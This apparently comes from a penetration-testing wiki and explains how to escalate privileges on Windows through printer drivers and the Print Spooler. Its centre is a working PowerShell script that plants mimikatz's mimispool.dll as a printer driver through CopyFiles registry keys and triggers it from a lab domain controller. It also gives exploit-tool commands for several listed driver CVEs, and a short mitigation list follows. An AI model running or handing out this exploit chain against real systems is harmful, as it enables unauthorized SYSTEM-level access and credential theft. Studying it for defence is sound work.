EoP - Printers

Exploiting Printer Vulnerabilities: A Security Assessment

Overview

Printers, particularly their drivers and associated services like the Windows Print Spooler, have emerged as significant attack vectors for Elevation of Privilege (EoP). Exploiting vulnerabilities in printer drivers can provide attackers unauthorized system access and control.

Vulnerable Printer Drivers

A critical component of the exploitation process involves identifying and leveraging vulnerable printer drivers. Below is an example of a potentially vulnerable driver:

Key Driver Information

Details

Service Name

ctxusbm

Path

C:\Windows\system32\DRIVERS\ctxusbm.sys

Version

14.11.0.138

Creation Time (UTC)

17/05/2018 01:20:50

Certificate Issuer

CN=Symantec Class 3 SHA256 Code Signing CA, O=Symantec Corp

Signer

CN="Citrix Systems, Inc.", O="Citrix Systems, Inc."

Although the driver is signed by a reputable authority, vulnerabilities might still exist.

Creating a Malicious Printer

To exploit vulnerable drivers, an attacker can create a malicious printer using PowerShell. Below is an outline of the steps.

PowerShell Script for Printer Creation

# Define the printer name and path variables
$printerName = 'Universal Priv Printer'
$system32 = $env:systemroot + '\system32'
$drivers = $system32 + '\spool\drivers'
$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\'

# Copy necessary DLL files to system directories
Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mscms.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\mimispool.dll')

# Add a generic printer driver and create a printer
Add-PrinterDriver -Name 'Generic / Text Only'
Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'PORTPROMPT:'

# Create registry entries to load the malicious DLL
New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType String -Value $drivers
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType String -Value 'mimispool.dll'

Executing the Driver

Once the malicious printer is set up, execute the associated driver to exploit the vulnerabilities.

# Define server and printer name
$serverName = 'dc.purple.lab'
$fullPrinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'64-bit'} else {'32-bit'})

# Remove and re-add the printer
Remove-Printer -Name $fullPrinterName -ErrorAction SilentlyContinue
Add-Printer -ConnectionName $fullPrinterName

Exploitation of Printer Vulnerabilities

Known Vulnerabilities

Below are examples of known vulnerabilities in printer drivers that attackers might exploit:

Vulnerability Name

CVE

Description

ACIDDAMAGE

CVE-2021-35449

Lexmark Universal Print Driver Local Privilege Escalation

RADIANTDAMAGE

CVE-2021-38085

Canon TR150 Print Driver Local Privilege Escalation

POISONDAMAGE

CVE-2019-19363

Ricoh PCL6 Print Driver Local Privilege Escalation

SLASHINGDAMAGE

CVE-2020-1300

Windows Print Spooler Local Privilege Escalation

Exploitation Workflow Using Custom Tools

Attackers can further automate exploitation using custom tools.

# Start the server for exploitation
cp_server.exe -e ACIDDAMAGE

# Configure the client for connecting to the malicious printer
cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE
cp_client.exe -l -e ACIDDAMAGE

Mitigation Strategies

To counter these threats, organizations should implement the following measures:

  1. Patch Management

    • Regularly update printer drivers and the Windows Print Spooler service.

    • Apply security patches addressing known vulnerabilities.

  2. Driver Validation

    • Restrict loading of unsigned or improperly signed drivers.

    • Enforce strict driver validation policies.

  3. Network Security

    • Limit access to network printers and spooler services.

    • Use network segmentation to isolate printers from critical systems.

  4. Monitoring and Logging

    • Enable logging for printer-related activities.

    • Monitor for suspicious printer additions or driver installations.

  5. Least Privilege Principle

    • Restrict administrative rights to manage printer settings.

    • Limit user access to shared printers.

Conclusion

The exploitation of printer vulnerabilities through insecure drivers and services remains a critical risk. By understanding the attack vectors and implementing robust mitigation strategies, organizations can significantly reduce the likelihood of such attacks and safeguard their systems against privilege escalation threats.

PreviousEoP - Evaluating Vulnerable DriversNextEoP - Runas

Last updated